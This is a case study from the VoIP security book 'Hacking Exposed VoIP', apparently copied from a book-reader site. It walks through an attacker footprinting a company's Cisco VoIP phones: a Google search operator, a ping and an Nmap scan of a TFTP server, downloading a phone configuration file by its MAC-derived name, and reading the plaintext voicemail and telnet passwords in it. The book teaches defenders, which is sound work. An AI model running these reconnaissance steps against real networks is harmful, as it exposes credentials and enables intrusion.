Part I: Casing the Establishment

Chapter List

Chapter 1: Footprinting a VoIP Network
Chapter 2: Scanning a VoIP Network
Chapter 3: Enumerating a VoIP Network

Case Study: My VOIP Gear is Secure From Outsiders, Right?

Many of VoIP's security issues are similar to those of Internet applications installed in your enterprise. This similarity is mostly due to the fact that VoIP devices inherit so many of the traditional security vulnerabilities of the supporting services and infrastructure around them. Another reason is that VoIP phones and servers tend to support a wide range of features including HTTP, telnet, SNMP, TFTP, and the list goes on.

Because VoIP components typically support a variety of administrative protocols, this simplifies an attacker's efforts to perform basic network reconnaissance. Believe it or not, simply using Google can lead to a treasure trove of information about your VoIP network.

Lock and Load with Google

When performing reconnaissance on a potential target, there are a variety of ways a attacker can leverage search engines simply using the advanced features of a service such as Google. First, an attacker scours your company's job listings to see if any juicy details can be unearthed; lo and behold, he comes up with a job listing for "Cisco VoIP Engineer."

Leveraging this bit of information, he then dusts off his Google hacking skills to determine if any of your Cisco VoIP phones are exposed to the Internet. Because Google will index anything with a web service, it turns out that many VoIP phones are inadvertently advertised on the Internet because of their built-in web servers. The attacker types the following into a Google search:

inurl:"NetworkConfiguration" cisco site: yourcompany .com

He comes up with three hits:

Results 13 of 3 for " NetworkConfiguration " cisco site: yourcompany .com (0.10 seconds).

The hacker has just found the administrative web interface to three of your Cisco IP phones that were mistakenly left exposed to the Internet. As it turns out, without even needing a password, simply clicking any of these hits gives the hacker a wealth of information:

 DHCP Server BOOTP Server    No MAC Address     001120017EA3 Host Name       gk002020036ea3 Domain Name IP Address Default Router Subnet Mask TFTP Server     1 NTP Server 1 NTP Server 2 DNS Server 1 DNS Server 2 Alt NTP Server 1 Alt NTP Server 2 

Probing and Enumerating Our Way to Success

Most VoIP phones check and download their configuration files after each reboot from a central TFTP server. Now that the attacker knows an IP address of a TFTP server from his Google hacking of the Cisco phones, he can check to see if that server is also accessible from the Internet:

 C:\>ping Pinging [] with 32 bytes of data: Reply from bytes=32 time=20ms TTL=54 Reply from bytes=32 time=21ms TTL=54 Reply from bytes=32 time=22ms TTL=55 Reply from bytes=32 time=21ms TTL=54 Ping statistics for     Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds:     Minimum = 20ms, Maximum = 22ms, Average = 21ms 

Good news for the attacker, he can reach the TFTP server remotely without having to gain further access to your network. Next, to ensure the actual TFTP port is accessible, he fires up his copy of Nmap with a simple UDP scan:

 Starting Nmap 4.01 ( at 2006-02-20  05:26 EST Interesting ports on ( (The 1473 ports scanned but not shown below are in state: closed) PORT      STATE         SERVICE 67/udp    open          dhcpserver 69/udp    open          tftp 111/udp   open          rpcbind 123/udp   open          ntp 784/udp   open          unknown 5060/udp  open          sip 32768/udp open          omad 

Sure enough, UDP port 69 (TFTP) is wide open for the attacker to start running queries against. The attacker is looking specifically for configuration files that he knows the exact names of; otherwise , he won't be able to retrieve them.

Thanks to his previous Google hacking exercise, the attacker uses the MAC address of the Cisco phone to predict the configuration filename to download:

 [root@attacker]# tftp tftp> get SEP001120017EA3.cnf 

Success! Now the attacker can read the configuration file for the SIP phone he just downloaded:

 [root@attacker]# cat SEP001120017EA3.cnf # SIP Configuration Generic File (start) # Line 1 Settings line1_name: "502"                       ; Line 1 Extension\User ID line1_displayname: "502"                ; Line 1 Display Name line1_authname: "502"                   ; Line 1 Registration Authentication line1_password: "1234"                  ; Line 1 Registration Password # Line 2 Settings line2_name: ""                          ; Line 2 Extension\User ID line2_displayname: ""                   ; Line 2 Display Name line2_authname: "UNPROVISIONED"         ; Line 2 Registration Authentication line2_password: "UNPROVISIONED"         ; Line 2 Registration Password # Line 3 Settings line3_name: ""                          ; Line 3 Extension\User ID line3_displayname: ""                   ; Line 3 Display Name line3_authname: "UNPROVISIONED"         ; Line 3 Registration Authentication line3_password: "UNPROVISIONED"         ; Line 3 Registration Password # Line 4 Settings line4_name: ""                          ; Line 4 Extension\User ID line4_displayname: ""                   ; Line 4 Display Name line4_authname: "UNPROVISIONED"         ; Line 4 Registration Authentication line4_password: "UNPROVISIONED"         ; Line 4 Registration Password # Line 5 Settings line5_name: ""                          ; Line 5 Extension\User ID line5_displayname: ""                   ; Line 5 Display Name line5_authname: "UNPROVISIONED"         ; Line 5 Registration Authentication line5_password: "UNPROVISIONED"         ; Line 5 Registration Password # Line 6 Settings line6_name: ""                          ; Line 6 Extension\User ID line6_displayname: ""                   ; Line 6 Display Name line6_authname: "UNPROVISIONED"         ; Line 6 Registration Authentication line6_password: "UNPROVISIONED"         ; Line 6 Registration Password # NAT/Firewall Traversal nat_address: "" voip_control_port: "5060" start_media_port: "16384" end_media_port:  "32766" # Phone Label (Text desired to be displayed in upper right corner) phone_label: "cisco 7960"            ; Has no effect on SIP messaging # Time Zone phone will reside in time_zone: EST # Phone prompt/password for telnet/console session phone_prompt: "Cisco7960"                      ; Telnet/Console Prompt phone_password: "abc"                         ; Telnet/Console Password # SIP Configuration Generic File (stop) 

As you can see, the attacker now has access to the particular phone user's extension (502), her voicemail password (1234), and finally the administrative telnet password to her phone (abc). Using these details, there is no limit to the mischief that the attacker can perform.

As you will learn in the following chapters, there is a wealth of information that can be gleaned remotely using standard security reconnaissance techniques. To an attacker, footprinting, scanning, and enumeration are all valuable endeavors that will typically yield the information necessary to perform more advanced attacks.

Hacking Exposed VoIP. Voice Over IP Security Secrets & Solutions
Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions
ISBN: 0072263644
EAN: 2147483647
Year: 2004
Pages: 158

Similar book on Amazon © 2008-2017.
If you may any questions please contact us: